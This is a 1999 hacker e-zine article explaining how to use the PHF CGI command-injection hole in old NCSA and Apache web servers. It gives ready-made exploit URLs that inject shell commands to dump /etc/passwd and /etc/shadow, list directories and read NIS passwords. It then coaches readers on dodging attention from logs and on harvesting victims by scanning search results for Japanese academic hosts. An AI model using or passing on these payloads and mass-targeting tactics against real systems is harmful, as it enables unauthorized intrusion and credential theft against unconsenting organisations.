Copy Link
Add to Bookmark
Report
The Discordant Opposition Journal Issue 02 File 05
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 5 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:The Complete Guide to PHF:
Digital Avatar
1. What is PHF?
The PHF (packet handler function) white pages directory
services program distributed with the NCSA httpd, versions
1.5a and earlier, and also included in the Apache distribution
prior to version 1.0.5, passes unchecked newline (hex 0a)
characters to the Unix shell. Unauthorised access to the server
host may allow an intruder to read, modify, or destroy files.
The phf program implements a form-based interface to a local
CCSO Name Server. The CCSO Name Server is a white pages service
used for looking up name and address information about people.
With phf, a hacker can execute commands on the server host
using the same user-id as the user running the "httpd" server.
If "httpd" is being run as root, the hacker's commands are also
run as root. He can access any file on the system that is
accessible to the user-id that is running the httpd server.
The phf phone book script file in the cgi-bin directory can
be exploited to give a hacker the password (etc/passwd) file in
Unix systems. The phf phone book script is distributed with NCSA
and Apache httpd. This default file is a sample form titled "Form
for CSO PH query" and can be exploited to view files on a system.
The phf exploit is one of the most common ways of obtaining
password files of of systems on the internet.
2. How do I use PHF?
Alright. To use PHF you enter the following command line into
any web browser:
http://www.target_goes_here.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
This takes you to the /etc/passwd file of the target computer.
Neat, huh? Anything after Qalias=x%0a/bin/ is the command. You can
do virtually any command. You cannot edit files though. It doesnt
work.
Examples:
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow -displays the
shadow file
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd -displays the
passwd file
/cgi-bin/phf?Qalias=x%0a/bin/ls%20/ -lists the root dir
/cgi-bin/phf?Qalias=x%0a/bin/ls%20/bin -lists the bin dir
/cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/bin -lists the bin dir
and shows file permissions
/cgi-bin/phf?Q=%0aid - gives you the uid of nobody
/cgi-bin/phf?Q=%0a/bin/uname%20-a - give operating system
/cgi-bin/phf?Q=%0apwd - print working directory
/cgi-bin/test-cgi?* - get all files in /cgi-bin/
/cgi-bin/test-cgi?/* - get all directories
/cgi-bin/nph-test-cgi?* - get all files in /cgi-bin/
/cgi-bin/nph-test-cgi?/* - get all directories
/cgi/bin/phf?Q=%0a/bin/ypcat%20passwd - get ypcat passwd
3. What happens if it says "404 Error" or "Caught on Candid
Camera"?
Well, a 404 Error indicates that the target is patched of this
hole already or that they do not have PHF on their system, among
other things. If it gives you a 404, move on to a new target.
Caught on Candid Camera is a small joke in a way. When you get
this screen it means they have logged that you have just tried
to access them via PHF. Don't worry about getting caught though.
They hardly ever report it. Just don't go try the same place every
time. If they are logging you then they might get a little curious
after you try PHF on them 10 times. Use PHF wisely.
4. How do I find new targets?
The usual way to get new targets is to pick a country, say Japan.
Go to www.altavista.com, next and search for "ac.jp". This will
turn up a lot of results from the academic hosts in Japan. Take
each listing's address and put it before the /cgi-bin in the PHF
command line. You can scan all the results quite quickly if you
have two browser windows open. One contains:
http://www.target_goes_here.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
The other contains your altavista search. Simply Copy the address
from altavistsa and paste it onto the www.target_goes_here.com in
your other window. You can go through 75-100 sites quite easily. I
tend to get about 1/100 hits that have a usable PHF. Don't expect
anything better...
-Digital Avatar
apparitione@gmx.de
